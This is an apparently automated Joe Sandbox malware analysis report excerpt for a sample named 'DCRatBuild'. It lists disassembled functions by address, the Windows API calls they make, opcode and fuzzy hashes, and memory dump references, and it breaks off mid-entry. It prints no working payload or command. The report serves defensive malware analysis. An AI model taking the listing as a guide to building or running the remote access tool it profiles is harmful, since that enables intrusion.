                      • Opcode ID: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                      • Instruction ID: f1b38bbb08a1dd635c15eb40c3dcbe62767ca091cd713b6d38a0bf08bc82b3b4
                      • Opcode Fuzzy Hash: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                      • Instruction Fuzzy Hash: 8DE092356803086BDB119F64DC42FE9775CEB09382F484066B888D7160EB61DDD4AEB1
                      Function 00D7A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D1
                      • CoUninitialize.COMBASE(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: GdiplusShutdownUninitialize
                      • String ID:
                      • API String ID: 3856339756-0
                      • Opcode ID: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                      • Instruction ID: 6399e01a51c9b98dd648859fef60a28210f072a25afb60a639a6ccd5b2b8ce13
                      • Opcode Fuzzy Hash: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                      • Instruction Fuzzy Hash: FFF03932A18759EFC7109B4CDC05B19FBA9FB8AB20F04436AF419C3760CB786810CAA5
                      Function 00D6A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,?,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1A5
                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                      • Instruction ID: 4dfe254c48d2ba3aa2f13c2787643a26b6189cbba796470381bad6e3828b4603
                      • Opcode Fuzzy Hash: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                      • Instruction Fuzzy Hash: 97E09B359002185BCB10ABA8DC05BD5775CEB093E1F0441A2FD49E7290D7709D449AF1
                      Function 00D70085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DirectoryLibraryLoadSystem
                      • String ID:
                      • API String ID: 1175261203-0
                      • Opcode ID: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                      • Instruction ID: 1b0c1185b7d5af296f382d2ba750f28481705fcbcd572c695e4ab776a78b4d4a
                      • Opcode Fuzzy Hash: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                      • Instruction Fuzzy Hash: DCE0127690125C6BDB219AA49C09FD7776CEF0D392F0440A7BA4CD3144EA749A948BB0
                      Function 00D79B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                      Download Yara Rule
                      APIs
                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D79B37
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: BitmapCreateFromGdipStream
                      • String ID:
                      • API String ID: 1918208029-0
                      • Opcode ID: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                      • Instruction ID: 0d0d5dd5ed1ac18ea370282c45b02de57ebc0cb7a6bc9f8ab1ed06f42f020a4f
                      • Opcode Fuzzy Hash: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                      • Instruction Fuzzy Hash: 54E0ED72901218EBCB10DF98D541A99B7ECEB09321F10C09BE89993301E671AE049BB5
                      Function 00D8215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D8329A: try_get_function.LIBVCRUNTIME ref: 00D832AF
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D8217A
                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D82185
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                      • String ID:
                      • API String ID: 806969131-0
                      • Opcode ID: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                      • Instruction ID: ec2dee13527e13990df7c0ff5ab836e5062c19e99e18b53343e5371a1fc50c15
                      • Opcode Fuzzy Hash: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                      • Instruction Fuzzy Hash: B9D022782043022C2C0837F02C8AAB82384DA72FB03F00B8AFB20CA0D2EF2080087331
                      Function 00D7DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • DloadLock.DELAYIMP ref: 00D7DC73
                      • DloadProtectSection.DELAYIMP ref: 00D7DC8F
                        • Part of subcall function 00D7DE67: DloadObtainSection.DELAYIMP ref: 00D7DE77
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Dload$Section$LockObtainProtect
                      • String ID:
                      • API String ID: 731663317-0
                      • Opcode ID: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                      • Instruction ID: 3e7f1c1096a48527a6ee09fa5f7cf838311e7a89817a3a20b11c53a10bf22d49
                      • Opcode Fuzzy Hash: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                      • Instruction Fuzzy Hash: 25D0C9701003428AC312AF149A86B1C3676FF08744FA88655F29DC72A9FBA944C0C635
                      Function 00D612E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemShowWindow
                      • String ID:
                      • API String ID: 3351165006-0
                      • Opcode ID: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                      • Instruction ID: 21d06b82c98fd243a6d4ee7a605a2e8d45509b3b8c4b19974c80fdec23afa32a
                      • Opcode Fuzzy Hash: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                      • Instruction Fuzzy Hash: 51C01272058302BECB010BB0DC09D3FBBA8EBA4312F09C908B2A5C0160C638C010DB21
                      Function 00D619A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                      • Instruction ID: fe5c9e0ca5489f0039b603f1cfe99da8bdce8075588eef2059864119069cbb63
                      • Opcode Fuzzy Hash: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                      • Instruction Fuzzy Hash: 4AC19E38A042549FEF15CF68C895BAD7BA5EF0A304F1C40BAEC46DB286CB319944CB71
                      Function 00D63B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 85d304c84b2392b8b1d0c6fe6e127288110c44395a6cc4193dc37cb87916432b
                      • Instruction ID: 2ed1e4407d0606d5a186c1b1f09ec9734c29da4312e7b90d9f498d4e51655817
                      • Opcode Fuzzy Hash: 85d304c84b2392b8b1d0c6fe6e127288110c44395a6cc4193dc37cb87916432b
                      • Instruction Fuzzy Hash: 76719B71104B44AFDB25DB74CC51AEBB7E8EF14301F48496EE5AB47242DA32AA48CF31
                      Function 00D6837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D68384
                        • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D619A6: __EH_prolog.LIBCMT ref: 00D619AB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                      • Instruction ID: b486a27623308d5a3f2c9d95ae3f4606e1075415c57a56ed6c5bf78038689969
                      • Opcode Fuzzy Hash: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                      • Instruction Fuzzy Hash: CA4192318406589BDB20DB60CC55BEA73B9EF54300F0841EAE58AA7093DF756AC8EF70
                      Function 00D61E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61E05
                        • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                      • Instruction ID: 23f23f6f42cf2ad187efe297977900fdcc1c4032202b419aee3f9a9f113fe8db
                      • Opcode Fuzzy Hash: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                      • Instruction Fuzzy Hash: D52148759041089FCB11EF99D9419EEFBF5FF58300B1441AEE849A3252DB325E14CB70
                      Function 00D7A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7A7C8
                        • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: e1587dd2e1b121dca10afe6f1303b3b11b0f510459ec38037b02db9fc017d376
                      • Instruction ID: 08e32d68984b7646a2baae82b111a1a950a9aecc8e12b59f97cf6463b5543aa0
                      • Opcode Fuzzy Hash: e1587dd2e1b121dca10afe6f1303b3b11b0f510459ec38037b02db9fc017d376
                      • Instruction Fuzzy Hash: E9216B75C04259ABCF14DF98C9429EEB7B4EF59304F0444EEE809A7202EB356E06DB71
                      Function 00D692E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                      • Instruction ID: aed58e4984e558f14855a02c308467d490c89fca8c12015dc3cb50c756c0a34e
                      • Opcode Fuzzy Hash: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                      • Instruction Fuzzy Hash: F8116173E505289BCF22AFA8CC519EEF73AEF48750F054115F805B7361DA358D1186B0
                      Function 00D65BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D65BDC
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 325719526aebfd486de5f7f903f9b4984cd94df12b1c812a0ec6bb59d334f5f1
                      • Instruction ID: 2c4dbd83aaa074f33822a04342a63e525c60f77c141b670869583b9b0aa485bd
                      • Opcode Fuzzy Hash: 325719526aebfd486de5f7f903f9b4984cd94df12b1c812a0ec6bb59d334f5f1
                      • Instruction Fuzzy Hash: B1016D34A05A94DBC725F7A4D0553DDFBA4DF19700F40859EF86A53283CBB41B08C672
                      Function 00D88518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 2875df360ec9896ba171c109873623ded342a43ccdf5dba8873b14649a5c7beb
                      • Instruction ID: c8232b49d0d5c1f3dfc72431c807843d0c3ca43bb9b10fc08418296c2aafac30
                      • Opcode Fuzzy Hash: 2875df360ec9896ba171c109873623ded342a43ccdf5dba8873b14649a5c7beb
                      • Instruction Fuzzy Hash: FEE0E5615402225AEB3136695C00B6E778CEF413B0F980290EC54E2181CF20DC0067F5
                      Function 00D6A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D6A4F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: e744c8dc34558b5d7321776a42496605922ced728be0eeb715cd77d4108ba718
                      • Instruction ID: e7a58982640a4df3976ac2e3084f4080fb4ede3a11e5fb5fdb9304917c94c3d8
                      • Opcode Fuzzy Hash: e744c8dc34558b5d7321776a42496605922ced728be0eeb715cd77d4108ba718
                      • Instruction Fuzzy Hash: 41F0E931009380ABCA225B7C48047C6BB90AF06331F04CA49F1FD62195C27864D59F33
                      Function 00D7067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                      Download Yara Rule
                      APIs
                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00D706B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExecutionStateThread
                      • String ID:
                      • API String ID: 2211380416-0
                      • Opcode ID: 8082e9619b4c81a36daf3d6e84036c539a06d81ca7172ed19832e7d2480c7086
                      • Instruction ID: 17a05698a5532b0791bcd5beda4bc5ef4d4ce63d87b54ff0137d45aaa60d068d
                      • Opcode Fuzzy Hash: 8082e9619b4c81a36daf3d6e84036c539a06d81ca7172ed19832e7d2480c7086
